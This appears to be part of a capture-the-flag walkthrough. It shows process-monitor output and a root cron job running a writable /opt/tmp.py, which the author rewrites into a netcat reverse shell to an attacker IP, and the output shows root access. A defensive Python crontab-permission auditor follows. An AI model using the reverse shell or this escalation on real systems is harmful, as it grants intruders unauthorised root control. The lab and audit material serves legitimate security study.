2025/10/26 21:32:04 CMD: UID=1001  PID=1496   | ./pspy32
2025/10/26 21:32:04 CMD: UID=0     PID=1469   |
2025/10/26 21:32:04 CMD: UID=1001  PID=1439   | bash
2025/10/26 21:32:04 CMD: UID=1001  PID=1438   | sh
2025/10/26 21:32:04 CMD: UID=1001  PID=1437   | sshd: mindy@pts/1
2025/10/26 21:32:04 CMD: UID=0     PID=1431   | sshd: mindy [priv]
2025/10/26 21:32:04 CMD: UID=0     PID=1430   |
2025/10/26 21:32:04 CMD: UID=0     PID=1415   |
2025/10/26 21:32:04 CMD: UID=1001  PID=1393   | -rbash
2025/10/26 21:32:04 CMD: UID=1001  PID=1392   | sshd: mindy@pts/0
2025/10/26 21:32:04 CMD: UID=1001  PID=1384   | (sd-pam)
2025/10/26 21:32:04 CMD: UID=1001  PID=1383   | /lib/systemd/systemd --user
2025/10/26 21:32:04 CMD: UID=0     PID=1381   | sshd: mindy [priv]
2025/10/26 21:32:04 CMD: UID=33    PID=1300   | /usr/sbin/apache2 -k start
2025/10/26 21:32:04 CMD: UID=0     PID=1251   | /usr/sbin/cups-browsed
2025/10/26 21:32:04 CMD: UID=0     PID=1249   | /usr/sbin/cupsd -l
2025/10/26 21:32:04 CMD: UID=33    PID=1037   | /usr/sbin/apache2 -k start
2025/10/26 21:32:04 CMD: UID=33    PID=982    | /usr/sbin/apache2 -k start
2025/10/26 21:32:04 CMD: UID=0     PID=944    | /usr/sbin/apache2 -k start
2025/10/26 21:32:04 CMD: UID=111   PID=920    | /usr/lib/colord/colord
2025/10/26 21:32:04 CMD: UID=116   PID=905    | /usr/lib/gnome-settings-daemon/gnome-settings-daemon
2025/10/26 21:32:04 CMD: UID=0     PID=904    | /usr/lib/packagekit/packagekitd
2025/10/26 21:32:04 CMD: UID=0     PID=903    | /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
2025/10/26 21:32:04 CMD: UID=116   PID=889    | /usr/bin/pulseaudio --daemonize=no
2025/10/26 21:32:04 CMD: UID=116   PID=886    | /usr/lib/at-spi2-core/at-spi2-registryd --use-gnome-session
2025/10/26 21:32:04 CMD: UID=116   PID=884    | /usr/bin/dbus-daemon --config-file=/usr/share/defaults/at-spi2/accessibility.conf --nofork --print-address 3
2025/10/26 21:32:04 CMD: UID=116   PID=870    | /usr/lib/at-spi2-core/at-spi-bus-launcher
2025/10/26 21:32:04 CMD: UID=116   PID=797    | /usr/bin/Xwayland :1024 -rootless -noreset -listen 4 -listen 5 -displayfd 6
2025/10/26 21:32:04 CMD: UID=0     PID=780    | /usr/lib/upower/upowerd
2025/10/26 21:32:04 CMD: UID=116   PID=775    | /usr/bin/gnome-shell
2025/10/26 21:32:04 CMD: UID=116   PID=758    | /usr/lib/gnome-session/gnome-session-binary --autostart /usr/share/gdm/greeter/autostart
2025/10/26 21:32:04 CMD: UID=116   PID=755    | /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation
2025/10/26 21:32:04 CMD: UID=116   PID=748    | /usr/lib/gdm3/gdm-wayland-session gnome-session --autostart /usr/share/gdm/greeter/autostart
2025/10/26 21:32:04 CMD: UID=116   PID=743    | (sd-pam)
2025/10/26 21:32:04 CMD: UID=116   PID=742    | /lib/systemd/systemd --user
2025/10/26 21:32:04 CMD: UID=0     PID=738    | gdm-session-worker [pam/gdm-launch-environment]
2025/10/26 21:32:04 CMD: UID=0     PID=731    | /usr/sbin/gdm3
2025/10/26 21:32:04 CMD: UID=0     PID=714    | /usr/sbin/minissdpd -i 0.0.0.0
2025/10/26 21:32:04 CMD: UID=0     PID=711    | /usr/sbin/sshd -D
2025/10/26 21:32:04 CMD: UID=0     PID=544    | /usr/lib/jvm/java-8-openjdk-i386//bin/java -Djava.ext.dirs=/opt/james-2.3.2/lib:/opt/james-2.3.2/tools/lib -Djava.security.manager -Djava.security.policy=jar:file:/opt/james-2.3.2/bin/phoenix-loader.jar!/META-INF/java.policy -Dnetworkaddress.cache.ttl=300 -Dphoenix.home=/opt/james-2.3.2 -Djava.io.tmpdir=/opt/james-2.3.2/temp -jar /opt/james-2.3.2/bin/phoenix-loader.jar
2025/10/26 21:32:04 CMD: UID=110   PID=539    | avahi-daemon: chroot helper
2025/10/26 21:32:04 CMD: UID=0     PID=534    | /usr/lib/policykit-1/polkitd --no-debug
2025/10/26 21:32:04 CMD: UID=0     PID=529    | /bin/sh /opt/james-2.3.2/bin/run.sh
2025/10/26 21:32:04 CMD: UID=0     PID=527    | /usr/bin/VGAuthService
2025/10/26 21:32:04 CMD: UID=110   PID=525    | avahi-daemon: running [solidstate.local]
2025/10/26 21:32:04 CMD: UID=0     PID=524    | /usr/sbin/NetworkManager --no-daemon
2025/10/26 21:32:04 CMD: UID=0     PID=523    | /usr/sbin/ModemManager
2025/10/26 21:32:04 CMD: UID=0     PID=522    | /lib/systemd/systemd-logind
2025/10/26 21:32:04 CMD: UID=108   PID=510    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
2025/10/26 21:32:04 CMD: UID=0     PID=508    | /usr/sbin/rsyslogd -n
2025/10/26 21:32:04 CMD: UID=0     PID=507    | /usr/sbin/cron -f
2025/10/26 21:32:04 CMD: UID=106   PID=506    | /usr/lib/rtkit/rtkit-daemon
2025/10/26 21:32:04 CMD: UID=0     PID=504    | /usr/lib/accountsservice/accounts-daemon
2025/10/26 21:32:04 CMD: UID=0     PID=414    |
2025/10/26 21:32:04 CMD: UID=0     PID=400    |
2025/10/26 21:32:04 CMD: UID=100   PID=395    | /lib/systemd/systemd-timesyncd
2025/10/26 21:32:04 CMD: UID=0     PID=362    | /lib/systemd/systemd-udevd
2025/10/26 21:32:04 CMD: UID=0     PID=326    | /lib/systemd/systemd-journald
2025/10/26 21:32:04 CMD: UID=0     PID=324    |
2025/10/26 21:32:04 CMD: UID=0     PID=323    | /usr/bin/vmtoolsd
...[snip]...
2025/10/26 21:32:04 CMD: UID=0     PID=2      |
2025/10/26 21:32:04 CMD: UID=0     PID=1      | /sbin/init
2025/10/26 21:33:01 CMD: UID=0     PID=1505   | /usr/sbin/CRON -f
2025/10/26 21:33:01 CMD: UID=0     PID=1506   | /usr/sbin/CRON -f
2025/10/26 21:33:01 CMD: UID=0     PID=1507   | /bin/sh -c python /opt/tmp.py
2025/10/26 21:33:01 CMD: UID=0     PID=1508   | sh -c rm -r /tmp/*

Modify the tmp.py script to run a reverse shell command

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('nc 10.10.16.14 9001 -e /bin/sh')
except:
     sys.exit()

└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.14] from (UNKNOWN) [10.10.10.51] 50362
id
uid=0(root) gid=0(root) groups=0(root)

crontab -l
# Edit this file to introduce tasks to be run by cron.
...[snip]...
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h  dom mon dow   command
*/3 * * * * python /opt/tmp.py
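The root cron entry above runs a world-writable script every three minutes, which is the whole privilege escalation. As an added example (not part of the writeup, and not a real tool), here is the check an administrator would run to catch this class of misconfiguration before an attacker does: parse a root crontab, pick out every absolute path in each command, and report paths that are writable by someone other than root, not owned by root, symlinks, or sitting in a world-writable directory without the sticky bit. The `demo()` function builds a constructed temporary directory with a 0777 tmp.py beside a 0755 script and audits a crontab that references both; `expected_uid` exists so the demo can treat the current user as the expected owner, since the temporary files are not root-owned.

```python
import os
import re
import stat
import tempfile

# Five schedule fields then the command, as in a user crontab (`crontab -l`, no user column).
CRON_LINE = re.compile(r"^(\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(.*)$")


def script_paths(command):
    """Absolute paths mentioned in a crontab command; globs are skipped."""
    return [tok for tok in re.split(r"[\s;|&]+", command)
            if tok.startswith("/") and not any(c in tok for c in "*?[")]


def weakness(path, expected_uid=0):
    """Reasons this path is unsafe to run from a privileged cron job, or [] if fine."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return ["missing (an attacker could create it if the parent directory is writable)"]
    reasons = []
    if stat.S_ISLNK(st.st_mode):
        reasons.append("symlink")
    if st.st_uid != expected_uid:
        reasons.append("owned by uid %d, expected %d" % (st.st_uid, expected_uid))
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    pst = os.stat(os.path.dirname(path))
    if pst.st_mode & stat.S_IWOTH and not pst.st_mode & stat.S_ISVTX:
        reasons.append("parent directory world-writable without sticky bit")
    return reasons


def audit_crontab(text, expected_uid=0):
    """Parse crontab text and return (schedule, path, reasons) for every weak target."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if not m:
            continue
        schedule, command = m.groups()
        for path in script_paths(command):
            reasons = weakness(path, expected_uid)
            if reasons:
                findings.append((schedule, path, reasons))
    return findings


def demo():
    """Constructed scenario: a world-writable tmp.py next to a correctly permissioned script."""
    d = tempfile.mkdtemp()
    bad, good = os.path.join(d, "tmp.py"), os.path.join(d, "backup.py")
    for path, mode in ((bad, 0o777), (good, 0o755)):
        with open(path, "w") as f:
            f.write("print('hi')\n")
        os.chmod(path, mode)
    crontab = ("# m h  dom mon dow   command\n"
               "*/3 * * * * python %s\n"
               "0 2 * * * python %s\n" % (bad, good))
    return audit_crontab(crontab, expected_uid=os.getuid())


if __name__ == "__main__":
    for schedule, path, reasons in demo():
        print("%s  %s  ->  %s" % (schedule, path, ", ".join(reasons)))
```

On a real host the equivalent call is `audit_crontab(open("/var/spool/cron/crontabs/root").read())` run as root, and the same check belongs in a periodic compliance job; the /opt/tmp.py entry on this box would be reported as group-writable and world-writable.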